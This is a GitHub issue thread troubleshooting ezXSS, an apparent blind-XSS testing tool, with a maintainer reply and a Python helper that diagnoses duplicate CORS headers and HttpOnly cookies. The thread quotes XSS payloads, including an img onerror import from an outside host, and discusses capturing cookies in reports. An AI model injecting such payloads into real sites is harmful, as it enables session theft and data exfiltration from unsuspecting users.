Issue with some payloads
luchua-bc opened this issue · 5 comments
I've upgraded to the latest version 4.2 and still noticed somehow some payloads don't work for me.
Basically I started an Apache2 server on another machine, edited its index.html page to include the payload, reloaded the page, then checked whether I received the access in "All Reports".
Somehow only access with the payload `<script src=//www.myhost.com></script>` was shown.
Other payloads such as `img` and `svg` don't work. For example, `"><img src onerror=import('//www.myhost.com')>`. Although I can see requests to www.myhost.com in server access logs, those requests didn't trigger report creation.
Would you please advise on what could be wrong with my configuration and/or test? Thanks in advance for your help.
Also I do have the following headers added through the `.htaccess` file:

```
Access-Control-Allow-Origin: *
Access-Control-Allow-Headers: origin, x-requested-with, content-type
Access-Control-Allow-Methods: GET, POST
```
Thanks.
Can you provide me more information please?
Does the payload trigger and post to the /callback? What's the status code of the callback?
Could you check with a ez.pe subdomain if it works the same or not? I need to know if this problem is in your browser, some server settings or actually in ezXSS. As far as I know they should all work.
> Also I do have the following headers added through the `.htaccess` file:
>
> ```
> Access-Control-Allow-Origin: *
> Access-Control-Allow-Headers: origin, x-requested-with, content-type
> Access-Control-Allow-Methods: GET, POST
> ```
>
> Thanks.
You should not add these headers in the htaccess, since these are added by the code in 4.2. Adding this can actually break payloads.
Thanks @ssl a lot for the reply.
I did register an ez.pe subdomain before opening this issue and confirmed the same payload works there to rule out the possibility that the issue is caused by the ezXSS software or my browser. That is, it's related to my installation.
The issue was indeed caused by having those headers in the `.htaccess` file. After those headers were removed, the payload works like a charm.
However, I did notice in the report the `Cookies` textarea is blank for all my tests. Not sure whether the test pages I'm coming from don't have non-HTTP-only cookies or I need to do some configuration to have them show up. Please advise.
Cheers,
Luc
> The issue was indeed caused by having those headers in the `.htaccess` file. After those headers were removed, the payload works like a charm.
Great!
> However, I did notice in the report the `Cookies` textarea is blank for all my tests. Not sure whether the test pages I'm coming from don't have non-HTTP-only cookies or I need to do some configuration to have them show up. Please advise.
Pretty sure the cookies have an HTTP-only flag, which JavaScript is unable to read.
You can test your payload by visiting /assets/payload-tester.html on your host. This will generate a report including cookies.
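As an added illustration (not code from ezXSS or from either participant), here is a small Python helper that checks a captured HTTP response's headers for the two things this thread runs into: a single-valued CORS header such as `Access-Control-Allow-Origin` emitted twice (once by `.htaccess`, once by the application), which browsers reject and which makes the callback fail silently, and `Set-Cookie` entries carrying `HttpOnly`, which JavaScript cannot read and so never reach the report. The sample response headers are constructed.

```python
"""Diagnose duplicate CORS headers and HttpOnly cookies in raw response headers."""
from collections import defaultdict

# Browsers accept exactly one value for these; a duplicate such as "*, *"
# (one copy from .htaccess, one from the application) fails the CORS check.
SINGLE_VALUE_CORS = ("access-control-allow-origin", "access-control-allow-credentials")

# Constructed sample: the thread's .htaccess headers on top of the app's own one.
SAMPLE = """HTTP/1.1 200 OK
Access-Control-Allow-Origin: *
Access-Control-Allow-Headers: origin, x-requested-with, content-type
Access-Control-Allow-Methods: GET, POST
Access-Control-Allow-Origin: *
Set-Cookie: session=abc123; Path=/; HttpOnly; Secure
Set-Cookie: theme=dark; Path=/
Content-Type: text/html
"""


def parse_headers(raw):
    """Turn raw header text into (lowercase name, value) pairs; skips the status line."""
    pairs = []
    for line in raw.splitlines():
        if ":" not in line:
            continue
        name, value = line.split(":", 1)
        pairs.append((name.strip().lower(), value.strip()))
    return pairs


def duplicate_cors_headers(raw):
    """Return single-valued CORS headers that appear more than once, with all values."""
    seen = defaultdict(list)
    for name, value in parse_headers(raw):
        if name in SINGLE_VALUE_CORS:
            seen[name].append(value)
    return {name: values for name, values in seen.items() if len(values) > 1}


def httponly_cookies(raw):
    """Split Set-Cookie entries into names JavaScript can read and names it cannot."""
    readable, hidden = [], []
    for name, value in parse_headers(raw):
        if name != "set-cookie":
            continue
        cookie_name = value.split("=", 1)[0].strip()
        flags = [part.strip().lower() for part in value.split(";")[1:]]
        (hidden if "httponly" in flags else readable).append(cookie_name)
    return readable, hidden


if __name__ == "__main__":
    print("duplicate CORS headers:", duplicate_cors_headers(SAMPLE))
    print("readable / HttpOnly cookies:", httponly_cookies(SAMPLE))
```

Run it against the headers from `curl -i` on your callback URL; an empty dict from `duplicate_cors_headers` means the `.htaccess` headers are no longer doubling the application's own.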